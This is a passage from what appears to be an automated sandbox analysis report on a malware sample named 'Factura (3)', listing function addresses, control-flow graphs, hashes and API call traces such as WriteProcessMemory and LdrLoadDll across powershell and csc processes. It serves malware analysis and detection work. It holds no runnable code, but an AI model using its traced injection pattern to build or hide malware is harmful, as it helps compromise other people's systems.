                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ExceptionFileHeaderRaise
                                                      • String ID: csm
                                                      • API String ID: 2573137834-1018135373
                                                      • Opcode ID: da88a774326f10a492e3d8199edcbd95a9ac470012e81d63375fc4bc411e8847
                                                      • Instruction ID: 4cb891730635ff86ad2f899f576a9c75e83fab7aed293f564357dc68d2daaa8f
                                                      • Opcode Fuzzy Hash: da88a774326f10a492e3d8199edcbd95a9ac470012e81d63375fc4bc411e8847
                                                      • Instruction Fuzzy Hash: 15115E32618F4592EB699F26F480259B7E0FB88B84F984670DA8D47B58EF3CC591CB40

                                                      Execution Graph

                                                      Execution Coverage:3.7%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:5
                                                      Total number of Limit Nodes:1
                                                      execution_graph 11046 7ff887dc5a95 11048 7ff887dc5aa5 11046->11048 11047 7ff887dde239 11048->11047 11049 7ff887dde2f0 WriteProcessMemory 11048->11049 11050 7ff887dde3a6 11049->11050

                                                      Executed Functions

                                                      Function 00007FF887DC5A95 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 339COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1613146522.00007FF887DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ff887db0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CJ_L
                                                      • API String ID: 0-2543938809
                                                      • Opcode ID: 35ff056a94c4c6fdc8898c360413e116d805163e4fd69e9f5e231f4924a835ca
                                                      • Instruction ID: e619f9839a71757cc25664aaa5ef4b02a9b55e508709258b18fbf388a2c07f36
                                                      • Opcode Fuzzy Hash: 35ff056a94c4c6fdc8898c360413e116d805163e4fd69e9f5e231f4924a835ca
                                                      • Instruction Fuzzy Hash: B4A18031E0CA094FEB58DF58D845BE9BBE1FB59350F1442BED04ED3292DA34A885CB41
                                                      Function 00007FF887E8020E Relevance: .8, Instructions: 784COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 499 7ff887e8020e-7ff887e8020f 500 7ff887e80212-7ff887e80222 499->500 501 7ff887e80270-7ff887e802d9 499->501 504 7ff887e80236-7ff887e80243 500->504 505 7ff887e80224-7ff887e80232 500->505 512 7ff887e803df-7ff887e8041f 501->512 513 7ff887e802df-7ff887e802e9 501->513 510 7ff887e80244-7ff887e80252 504->510 505->510 511 7ff887e80234-7ff887e80235 505->511 511->504 526 7ff887e803b3-7ff887e803dc 512->526 527 7ff887e80421-7ff887e8042c 512->527 514 7ff887e802eb-7ff887e80303 513->514 515 7ff887e80305-7ff887e80312 513->515 514->515 522 7ff887e8037c-7ff887e80386 515->522 523 7ff887e80314-7ff887e80317 515->523 528 7ff887e80388-7ff887e80396 522->528 529 7ff887e80397-7ff887e803ad 522->529 523->522 525 7ff887e80319-7ff887e80321 523->525 525->512 530 7ff887e80327-7ff887e80331 525->530 526->512 531 7ff887e8042e-7ff887e80434 527->531 529->526 534 7ff887e8034a-7ff887e8034f 530->534 535 7ff887e80333-7ff887e80348 530->535 531->531 536 7ff887e80436-7ff887e8043b 531->536 534->522 539 7ff887e80351-7ff887e80352 534->539 535->534 540 7ff887e8043d-7ff887e80464 536->540 541 7ff887e80466-7ff887e8048f 536->541 543 7ff887e80359-7ff887e80361 539->543 540->541 552 7ff887e80496-7ff887e804a7 541->552 553 7ff887e80491 541->553 544 7ff887e80369-7ff887e8036e 543->544 545 7ff887e80363-7ff887e80367 543->545 548 7ff887e8036f-7ff887e8037b 544->548 545->548 555 7ff887e804ae-7ff887e80544 552->555 556 7ff887e804a9 552->556 553->552 554 7ff887e80493 553->554 554->552 562 7ff887e8064c-7ff887e80689 555->562 563 7ff887e8054a-7ff887e80554 555->563 556->555 557 7ff887e804ab 556->557 557->555 574 7ff887e806fe-7ff887e8070d 562->574 575 7ff887e8068b-7ff887e80697 562->575 564 7ff887e80556-7ff887e8056e 563->564 565 7ff887e80570-7ff887e8057d 563->565 564->565 572 7ff887e8057f-7ff887e80582 565->572 573 7ff887e805f0-7ff887e805fa 565->573 572->573 578 7ff887e80584-7ff887e8058c 572->578 576 7ff887e805fc-7ff887e80608 573->576 577 7ff887e80609-7ff887e80649 573->577 579 7ff887e8070f 574->579 580 7ff887e80710-7ff887e80795 574->580 581 7ff887e80699-7ff887e8069f 575->581 577->562 578->562 583 7ff887e80592-7ff887e8059c 578->583 579->580 603 7ff887e80808-7ff887e80812 580->603 604 7ff887e80797-7ff887e807a7 580->604 581->581 584 7ff887e806a1-7ff887e806a6 581->584 586 7ff887e8059e-7ff887e805b3 583->586 587 7ff887e805b5-7ff887e805b9 583->587 592 7ff887e806a8-7ff887e806cf 584->592 593 7ff887e806d1-7ff887e806f9 584->593 586->587 587->573 588 7ff887e805bb-7ff887e805c9 587->588 599 7ff887e805cb-7ff887e805d8 588->599 600 7ff887e805e2-7ff887e805ef 588->600 592->593 612 7ff887e806fc-7ff887e806fd 593->612 613 7ff887e806fb 593->613 599->600 608 7ff887e805da-7ff887e805e0 599->608 609 7ff887e8081c-7ff887e80861 603->609 610 7ff887e80814-7ff887e80819 603->610 614 7ff887e807a9-7ff887e807b2 604->614 615 7ff887e807b4-7ff887e807ca 604->615 608->600 616 7ff887e8081a-7ff887e8081b 610->616 612->574 613->612 614->615 615->616 623 7ff887e807cc-7ff887e80805 615->623
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1614016308.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ff887e80000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a7150f4672f33be723a96f940b85b3700477c2256aa282e960f1d913ac42148
                                                      • Instruction ID: c16fa3766802408093f6128203737f862fc99eec8ee27a41651625c1971a21f8
                                                      • Opcode Fuzzy Hash: 3a7150f4672f33be723a96f940b85b3700477c2256aa282e960f1d913ac42148
                                                      • Instruction Fuzzy Hash: FD323422A8DB894FF7A6972898156B87BF1FF56760B4801FBC05DC7193DA2C9C06C351
                                                      Function 00007FF887E837A9 Relevance: .6, Instructions: 622COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 628 7ff887e837a9-7ff887e83837 632 7ff887e8383d-7ff887e83847 628->632 633 7ff887e8394a-7ff887e839f9 628->633 634 7ff887e83849-7ff887e83861 632->634 635 7ff887e83863-7ff887e83870 632->635 661 7ff887e839fc-7ff887e83a0d 633->661 662 7ff887e839fb 633->662 634->635 642 7ff887e838eb-7ff887e838f5 635->642 643 7ff887e83872-7ff887e83875 635->643 645 7ff887e838f7-7ff887e83903 642->645 646 7ff887e83904-7ff887e83947 642->646 643->642 644 7ff887e83877-7ff887e8387f 643->644 644->633 648 7ff887e83885-7ff887e8388f 644->648 646->633 650 7ff887e838a8-7ff887e838ac 648->650 651 7ff887e83891-7ff887e838a1 648->651 650->642 655 7ff887e838ad-7ff887e838b1 650->655 656 7ff887e838a7 651->656 657 7ff887e838a3-7ff887e838a6 651->657 655->642 658 7ff887e838b2-7ff887e838b5 655->658 656->650 657->656 663 7ff887e838bb-7ff887e838c4 658->663 666 7ff887e83a0f 661->666 667 7ff887e83a10-7ff887e83aaa 661->667 662->661 664 7ff887e838dd-7ff887e838ea 663->664 665 7ff887e838c6-7ff887e838d3 663->665 665->664 670 7ff887e838d5-7ff887e838db 665->670 666->667 672 7ff887e83bf2-7ff887e83c78 667->672 673 7ff887e83ab0-7ff887e83aba 667->673 670->664 703 7ff887e83c7a-7ff887e83c80 672->703 674 7ff887e83abc-7ff887e83ad1 673->674 675 7ff887e83ad3-7ff887e83ad8 673->675 674->675 678 7ff887e83ade-7ff887e83ae1 675->678 679 7ff887e83b92-7ff887e83b9c 675->679 681 7ff887e83b26 678->681 682 7ff887e83ae3-7ff887e83af2 678->682 683 7ff887e83b9e-7ff887e83bac 679->683 684 7ff887e83bad-7ff887e83bef 679->684 688 7ff887e83b28-7ff887e83b2a 681->688 682->672 694 7ff887e83af8-7ff887e83b02 682->694 684->672 688->679 689 7ff887e83b2c-7ff887e83b32 688->689 691 7ff887e83b34-7ff887e83b4f 689->691 692 7ff887e83b51-7ff887e83b64 689->692 691->692 705 7ff887e83b7d-7ff887e83b91 692->705 706 7ff887e83b66-7ff887e83b73 692->706 697 7ff887e83b1b-7ff887e83b24 694->697 698 7ff887e83b04-7ff887e83b19 694->698 697->688 698->697 703->703 707 7ff887e83c82 703->707 706->705 710 7ff887e83b75-7ff887e83b7b 706->710 709 7ff887e83c84-7ff887e83c8a 707->709 709->709 711 7ff887e83c8c-7ff887e83cbb 709->711 710->705
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1614016308.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ff887e80000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 56c2a35dd31331580c00d0e1c7fb9c39cd60047d4d79a8363be00b98a8c84646
                                                      • Instruction ID: 08fc241add23ab6c7b2414a13f140d06fdcfb7a5e4a864ea3572d599c4c5a450
                                                      • Opcode Fuzzy Hash: 56c2a35dd31331580c00d0e1c7fb9c39cd60047d4d79a8363be00b98a8c84646
                                                      • Instruction Fuzzy Hash: C9024831A4CA8D4FF7A59A6898156BD7BF0FF4A760B4401BBD04DCB193DA2CAC06C351
                                                      Function 00007FF887E83CBD Relevance: .5, Instructions: 547COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 716 7ff887e83cbd-7ff887e83cc7 717 7ff887e83cce-7ff887e83cdf 716->717 718 7ff887e83cc9 716->718 720 7ff887e83ce6-7ff887e83cf7 717->720 721 7ff887e83ce1 717->721 718->717 719 7ff887e83ccb 718->719 719->717 723 7ff887e83cfe-7ff887e83d0f 720->723 724 7ff887e83cf9 720->724 721->720 722 7ff887e83ce3 721->722 722->720 726 7ff887e83d16-7ff887e83d27 723->726 727 7ff887e83d11 723->727 724->723 725 7ff887e83cfb 724->725 725->723 728 7ff887e83d2e-7ff887e83d48 726->728 729 7ff887e83d29 726->729 727->726 730 7ff887e83d13 727->730 732 7ff887e83d4a-7ff887e83daf 728->732 733 7ff887e83db0-7ff887e83db5 728->733 729->728 731 7ff887e83d2b 729->731 730->726 731->728 732->733 735 7ff887e83db7-7ff887e83dfe 733->735 736 7ff887e83db6 733->736 739 7ff887e84039-7ff887e84067 735->739 740 7ff887e83e04-7ff887e83e0e 735->740 736->735 751 7ff887e84069-7ff887e8406f 739->751 741 7ff887e83e27-7ff887e83e2c 740->741 742 7ff887e83e10-7ff887e83e25 740->742 743 7ff887e83fcc-7ff887e83fd6 741->743 744 7ff887e83e32-7ff887e83e37 741->744 742->741 747 7ff887e83fe9-7ff887e84036 743->747 748 7ff887e83fd8-7ff887e83fe8 743->748 749 7ff887e83e39-7ff887e83e4c 744->749 750 7ff887e83e81 744->750 747->739 749->739 761 7ff887e83e52-7ff887e83e5c 749->761 753 7ff887e83e83-7ff887e83e85 750->753 751->751 754 7ff887e84071-7ff887e84076 751->754 753->743 757 7ff887e83e8b-7ff887e83e92 753->757 759 7ff887e84078-7ff887e84098 754->759 760 7ff887e840a1-7ff887e840cd 754->760 757->743 763 7ff887e83e98-7ff887e83ea3 757->763 775 7ff887e8409a-7ff887e8409f 759->775 776 7ff887e840d0-7ff887e840e5 759->776 760->776 767 7ff887e83e5e-7ff887e83e6c 761->767 768 7ff887e83e76-7ff887e83e7f 761->768 764 7ff887e83ea5-7ff887e83eaf 763->764 765 7ff887e83eb3 763->765 769 7ff887e83ecf-7ff887e83ee5 764->769 770 7ff887e83eb1 764->770 774 7ff887e83eb8-7ff887e83ecd 765->774 767->768 778 7ff887e83e6e-7ff887e83e74 767->778 768->753 769->765 781 7ff887e83ee7-7ff887e83ef1 769->781 770->774 774->769 775->760 778->768 783 7ff887e83f0a-7ff887e83f11 781->783 784 7ff887e83ef3-7ff887e83f00 781->784 785 7ff887e83f13-7ff887e83f19 783->785 784->783 789 7ff887e83f02-7ff887e83f08 784->789 785->785 788 7ff887e83f1b-7ff887e83f78 785->788 796 7ff887e83f7a-7ff887e83f96 788->796 797 7ff887e83f98-7ff887e83fb6 788->797 789->783 796->797 799 7ff887e83fbc-7ff887e83fcb 797->799
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1614016308.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ff887e80000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 17abaa5afab4ae5f8d111e45d86e2f27e07976de270a184ef87c0ff9f14f4cf7
                                                      • Instruction ID: 6f5a5875f48023f627d7a699d40251765c787f726fd79af613d8b12d9235d443
                                                      • Opcode Fuzzy Hash: 17abaa5afab4ae5f8d111e45d86e2f27e07976de270a184ef87c0ff9f14f4cf7
                                                      • Instruction Fuzzy Hash: EFF1367194D7894FE7A69B2898152BC7BF0FF5A660B4901FFC08DC7193DA2C9846C392
                                                      Function 00007FF887E82064 Relevance: .4, Instructions: 441COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 801 7ff887e82064-7ff887e8206b 802 7ff887e8206d-7ff887e8207b 801->802 803 7ff887e820b5-7ff887e82187 801->803 807 7ff887e8218d-7ff887e82197 803->807 808 7ff887e822e9-7ff887e82314 803->808 809 7ff887e82199-7ff887e821b1 807->809 810 7ff887e821b3-7ff887e821c0 807->810 817 7ff887e82317-7ff887e82334 808->817 818 7ff887e82316 808->818 809->810 815 7ff887e8228a-7ff887e82294 810->815 816 7ff887e821c6-7ff887e821c9 810->816 822 7ff887e82296-7ff887e822a2 815->822 823 7ff887e822a3-7ff887e822e6 815->823 816->815 820 7ff887e821cf-7ff887e821d7 816->820 825 7ff887e82336-7ff887e8233c 817->825 818->817 820->808 824 7ff887e821dd-7ff887e821e7 820->824 823->808 827 7ff887e821e9-7ff887e821fe 824->827 828 7ff887e82200-7ff887e82204 824->828 825->825 829 7ff887e8233e-7ff887e82343 825->829 827->828 828->815 832 7ff887e8220a-7ff887e8220d 828->832 836 7ff887e8236e-7ff887e82399 829->836 837 7ff887e82345-7ff887e8236c 829->837 834 7ff887e8220f-7ff887e82218 832->834 835 7ff887e82224-7ff887e82228 832->835 834->835 835->815 843 7ff887e8222a-7ff887e82230 835->843 850 7ff887e8239c-7ff887e823ad 836->850 851 7ff887e8239b 836->851 837->836 844 7ff887e8224f 843->844 845 7ff887e82232-7ff887e8224d 843->845 849 7ff887e8225a-7ff887e82263 844->849 845->844 853 7ff887e8227c-7ff887e82289 849->853 854 7ff887e82265-7ff887e82272 849->854 855 7ff887e823af 850->855 856 7ff887e823b0-7ff887e823db 850->856 851->850 854->853 859 7ff887e82274-7ff887e8227a 854->859 855->856 860 7ff887e823de-7ff887e823ec 856->860 859->853 863 7ff887e823ee-7ff887e8240f 860->863 864 7ff887e82411-7ff887e82426 860->864 863->864 864->860 867 7ff887e82428-7ff887e8243a 864->867 871 7ff887e8243c-7ff887e82442 867->871 872 7ff887e82443-7ff887e8247b 867->872 871->872
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1614016308.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ff887e80000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 805c8f39fcc8ac2ade479614af1eb3cf6338d94a114c3e1d3c650adf00449088
                                                      • Instruction ID: 4e13c1509410d03120e8669f1e629e0f3b5ecbfc5fedb91abd828eeba4a9a419
                                                      • Opcode Fuzzy Hash: 805c8f39fcc8ac2ade479614af1eb3cf6338d94a114c3e1d3c650adf00449088
                                                      • Instruction Fuzzy Hash: 41D1E42194DBC94FF7A6966858642A83FF1EF56661B8901FBC04DCB0D3D91C9C45C352
                                                      Function 00007FF887E80255 Relevance: .1, Instructions: 136COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1614016308.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ff887e80000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a742df7fdd1d2621263ce4ec6750fc8becaf220e32608d232082301b16c53964
                                                      • Instruction ID: 0db8cac2444759b6fab5665c325cf7b9c42ba09450d6852e1427e5a4da55ff88
                                                      • Opcode Fuzzy Hash: a742df7fdd1d2621263ce4ec6750fc8becaf220e32608d232082301b16c53964
                                                      • Instruction Fuzzy Hash: 8B410D3194CB894FE7A6D628C8596683BF0FF56620B9940FAC05DCB093EA2DEC06C741
                                                      Function 00007FF887E8221C Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1614016308.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ff887e80000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0ec4725258f4218fba55f8187c793d1a390457b9f3785fe2b6ba2568e0e14d6a
                                                      • Instruction ID: f0f1bcf0325d7eecee0501f99ce5dcf62910fc7612a4b7dcaf47a3a9c4c3d16d
                                                      • Opcode Fuzzy Hash: 0ec4725258f4218fba55f8187c793d1a390457b9f3785fe2b6ba2568e0e14d6a
                                                      • Instruction Fuzzy Hash: BF01A222F4D91A0FFBF5921C24143BC61E6FF88A92B88417AC80EC3186DD1C9C408341
                                                      Function 00007FF887E82578 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1614016308.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ff887e80000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d40a4e44c62a4d00f3844f875a065076bbb696e8bce68c0702cc7f51abdcd65a
                                                      • Instruction ID: 56846e78c4958f9fcf64a7b7fe44dac45f37f05876b52cd8077a4d5deb9aa93e
                                                      • Opcode Fuzzy Hash: d40a4e44c62a4d00f3844f875a065076bbb696e8bce68c0702cc7f51abdcd65a
                                                      • Instruction Fuzzy Hash: E6E0D833ECD9591FF7B1A29C38192FC66A0FF5866678402B7D40EC3145DC189C508382

                                                      Execution Graph

                                                      Execution Coverage:1.4%
                                                      Dynamic/Decrypted Code Coverage:5.2%
                                                      Signature Coverage:9%
                                                      Total number of Nodes:134
                                                      Total number of Limit Nodes:8
                                                      execution_graph 78093 42a743 78094 42a75d 78093->78094 78097 53e2df0 LdrInitializeThunk 78094->78097 78095 42a785 78097->78095 78098 42e0c3 78099 42e0d3 78098->78099 78100 42e0d9 78098->78100 78103 42d0c3 78100->78103 78102 42e0ff 78106 42b413 78103->78106 78105 42d0de 78105->78102 78107 42b430 78106->78107 78108 42b441 RtlAllocateHeap 78107->78108 78108->78105 78109 4242e3 78114 4242f2 78109->78114 78110 42437c 78111 424339 78117 42cfe3 78111->78117 78114->78110 78114->78111 78115 424377 78114->78115 78116 42cfe3 RtlFreeHeap 78115->78116 78116->78110 78120 42b463 78117->78120 78119 424349 78121 42b480 78120->78121 78122 42b491 RtlFreeHeap 78121->78122 78122->78119 78235 423f53 78236 423f6f 78235->78236 78237 423f97 78236->78237 78238 423fab 78236->78238 78239 42b113 NtClose 78237->78239 78240 42b113 NtClose 78238->78240 78241 423fa0 78239->78241 78242 423fb4 78240->78242 78245 42d103 RtlAllocateHeap 78242->78245 78244 423fbf 78245->78244 78123 41ac03 78124 41ac47 78123->78124 78125 41ac68 78124->78125 78127 42b113 78124->78127 78128 42b12d 78127->78128 78129 42b13e NtClose 78128->78129 78129->78125 78130 413c23 78131 413c3c 78130->78131 78136 4175d3 78131->78136 78133 413c5a 78134 413ca6 78133->78134 78135 413c93 PostThreadMessageW 78133->78135 78135->78134 78138 4175f7 78136->78138 78137 4175fe 78137->78133 78138->78137 78139 417633 LdrLoadDll 78138->78139 78140 41764a 78138->78140 78139->78140 78140->78133 78141 41dd23 78142 41dd49 78141->78142 78146 41de34 78142->78146 78147 42e1f3 78142->78147 78144 41dddb 78144->78146 78153 42a793 78144->78153 78148 42e163 78147->78148 78149 42e1c0 78148->78149 78150 42d0c3 RtlAllocateHeap 78148->78150 78149->78144 78151 42e19d 78150->78151 78152 42cfe3 RtlFreeHeap 78151->78152 78152->78149 78154 42a7b0 78153->78154 78157 53e2c0a 78154->78157 78155 42a7dc 78155->78146 78158 53e2c1f LdrInitializeThunk 78157->78158 78159 53e2c11 78157->78159 78158->78155 78159->78155 78246 4187d5 78247 42b113 NtClose 78246->78247 78248 4187df 78247->78248 78160 401d87 78161 401d5c 78160->78161 78164 42e583 78161->78164 78167 42cbe3 78164->78167 78168 42cc09 78167->78168 78179 4076e3 78168->78179 78170 42cc1f 78171 401e86 78170->78171 78182 41aa13 78170->78182 78173 42cc3e 78174 42cc53 78173->78174 78197 42b4b3 78173->78197 78193 4271e3 78174->78193 78177 42cc62 78178 42b4b3 ExitProcess 78177->78178 78178->78171 78181 4076f0 78179->78181 78200 416313 78179->78200 78181->78170 78183 41aa3f 78182->78183 78211 41a903 78183->78211 78186 41aa84 78189 41aaa0 78186->78189 78191 42b113 NtClose 78186->78191 78187 41aa6c 78188 41aa77 78187->78188 78190 42b113 NtClose 78187->78190 78188->78173 78189->78173 78190->78188 78192 41aa96 78191->78192 78192->78173 78194 42723d 78193->78194 78196 42724a 78194->78196 78222 418123 78194->78222 78196->78177 78198 42b4cd 78197->78198 78199 42b4de ExitProcess 78198->78199 78199->78174 78201 416327 78200->78201 78203 416340 78201->78203 78204 42bb53 78201->78204 78203->78181 78206 42bb6b 78204->78206 78205 42bb8f 78205->78203 78206->78205 78207 42a793 LdrInitializeThunk 78206->78207 78208 42bbe1 78207->78208 78209 42cfe3 RtlFreeHeap 78208->78209 78210 42bbf4 78209->78210 78210->78203 78212 41a9f9 78211->78212 78213 41a91d 78211->78213 78212->78186 78212->78187 78217 42a833 78213->78217 78216 42b113 NtClose 78216->78212 78218 42a84d 78217->78218 78221 53e35c0 LdrInitializeThunk 78218->78221 78219 41a9ed 78219->78216 78221->78219 78223 41814d 78222->78223 78224 4185bb 78223->78224 78230 413d53 78223->78230 78224->78196 78226 41825a 78226->78224 78227 42cfe3 RtlFreeHeap 78226->78227 78228 418272 78227->78228 78228->78224 78229 42b4b3 ExitProcess 78228->78229 78229->78224 78231 413d72 78230->78231 78232 413e90 78231->78232 78234 4137a3 LdrInitializeThunk 78231->78234 78232->78226 78234->78232 78249 4137fa 78250 4137b0 78249->78250 78253 4137fe 78249->78253 78254 42b383 78250->78254 78255 42b3a0 78254->78255 78258 53e2c70 LdrInitializeThunk 78255->78258 78256 4137c2 78258->78256 78259 53e2b60 LdrInitializeThunk

                                                      Executed Functions

                                                      Function 004175D3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 189 4175d3-4175ef 190 4175f7-4175fc 189->190 191 4175f2 call 42dce3 189->191 192 417602-417610 call 42e203 190->192 193 4175fe-417601 190->193 191->190 196 417620-417631 call 42c6b3 192->196 197 417612-41761d call 42e4a3 192->197 202 417633-417647 LdrLoadDll 196->202 203 41764a-41764d 196->203 197->196 202->203
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417645
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_400000_csc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 8e002775716ddafbd47eb7ae43edb81b7bd9865612dd9b2aa705ee0c60120a3d
                                                      • Instruction ID: 197bba766baae9ccb9378d914d43791810f684092e84117df41e3d66ad4e84ee
                                                      • Opcode Fuzzy Hash: 8e002775716ddafbd47eb7ae43edb81b7bd9865612dd9b2aa705ee0c60120a3d
                                                      • Instruction Fuzzy Hash: 77015EB1E0020DABDB10DAA5DC42FDEB378AB14318F0041AAE90897240F634EB448B95
                                                      Function 0042B113 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 214 42b113-42b14c call 404e93 call 42c1b3 NtClose
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_400000_csc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: ab3c5e634df23d89e276a079ed4ca5b525763aa1515c01312f02267f7250b466
                                                      • Instruction ID: ecdc66760f4493d66e7f9721100b8e1ee1bc8025f612352e310ca33c1c5f3aed
                                                      • Opcode Fuzzy Hash: ab3c5e634df23d89e276a079ed4ca5b525763aa1515c01312f02267f7250b466
                                                      • Instruction Fuzzy Hash: C8E04F312002147BD210AA6ADC42FDB776CEFC5750F40401AFA0CA7282C67479118AF4
                                                      Function 053E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d3ae9b3497c1a8f009478201d8ef63be719e3d03548322886e40319e9260c038
                                                      • Instruction ID: 4eb08c104f3452b3f2ce1c3c4959ee76fd1f2ce983531638624a45af199248c3
                                                      • Opcode Fuzzy Hash: d3ae9b3497c1a8f009478201d8ef63be719e3d03548322886e40319e9260c038
                                                      • Instruction Fuzzy Hash: 0B90023660550402D904715C45547065015C7D1201FA5C411A1464568D8795CA6166B2
                                                      Function 053E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 230 53e2df0-53e2dfc LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f59fe0a513b1c5cba6258108aae2539bc8469963dc4dc473e89d038a9d7b99fd
                                                      • Instruction ID: 716ef4cb5645b13e384402531e43b87adf7c822ac07a8dc3feb2baee33e20843
                                                      • Opcode Fuzzy Hash: f59fe0a513b1c5cba6258108aae2539bc8469963dc4dc473e89d038a9d7b99fd
                                                      • Instruction Fuzzy Hash: D590023620140413D915715C45447074019C7D1241FD5C412A1464558D9756CA62A231
                                                      Function 053E2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 229 53e2c70-53e2c7c LdrInitializeThunk
                                                      APIs
